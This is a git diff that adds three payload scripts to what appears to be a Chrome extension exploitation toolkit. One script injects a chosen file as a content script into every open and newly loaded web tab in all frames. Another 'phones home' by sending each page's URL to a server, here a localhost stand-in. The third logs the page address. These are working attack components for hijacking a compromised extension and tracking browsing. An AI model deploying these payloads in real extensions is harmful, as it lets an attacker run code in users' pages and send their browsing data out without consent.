diff --git a/tools/chrome_extensions_exploitation/payloads/cs.js b/tools/chrome_extensions_exploitation/payloads/cs.js
new file mode 100644
index 000000000..c952180ab
--- /dev/null
+++ b/tools/chrome_extensions_exploitation/payloads/cs.js
@@ -0,0 +1,2 @@
+// sample payload
+console.log(location.href);
diff --git a/tools/chrome_extensions_exploitation/payloads/cs_mass_poison.js b/tools/chrome_extensions_exploitation/payloads/cs_mass_poison.js
new file mode 100644
index 000000000..d07e5e7fd
--- /dev/null
+++ b/tools/chrome_extensions_exploitation/payloads/cs_mass_poison.js
@@ -0,0 +1,23 @@
+// add a /cs.js file to extension and have it run in a content script on every tab
+var INJECTOR_CS_PAYLOAD = '/cs.js';
+// requires tabs permissions
+
+chrome.tabs.query({}, function (tabs) {
+        for (var i = 0; i < tabs.length; i++) {
+            if (tabs[i].url.match('^http')) {
+                chrome.tabs.executeScript(tabs[i].id, {
+                    allFrames: true,
+                    file: INJECTOR_CS_PAYLOAD});
+            }
+        }
+    }
+);
+
+chrome.tabs.onUpdated.addListener( function (tabId, changeInfo, tab) {
+  if (changeInfo.status == 'complete' && tab.url.match('^http')) {
+      chrome.tabs.executeScript(tabId, {
+        allFrames: true,
+        file: INJECTOR_CS_PAYLOAD
+      });   
+  }
+});
diff --git a/tools/chrome_extensions_exploitation/payloads/phonehome.js b/tools/chrome_extensions_exploitation/payloads/phonehome.js
new file mode 100644
index 000000000..533331e1f
--- /dev/null
+++ b/tools/chrome_extensions_exploitation/payloads/phonehome.js
@@ -0,0 +1,6 @@
+var x = new XMLHttpRequest();
+x.open('get', 'http://localhost/?url=' + encodeURIComponent(location.href), true);
+x.onload = x.onerror = function() {
+console.log('phoned home');
+}
+x.send(null);
\ No newline at end of file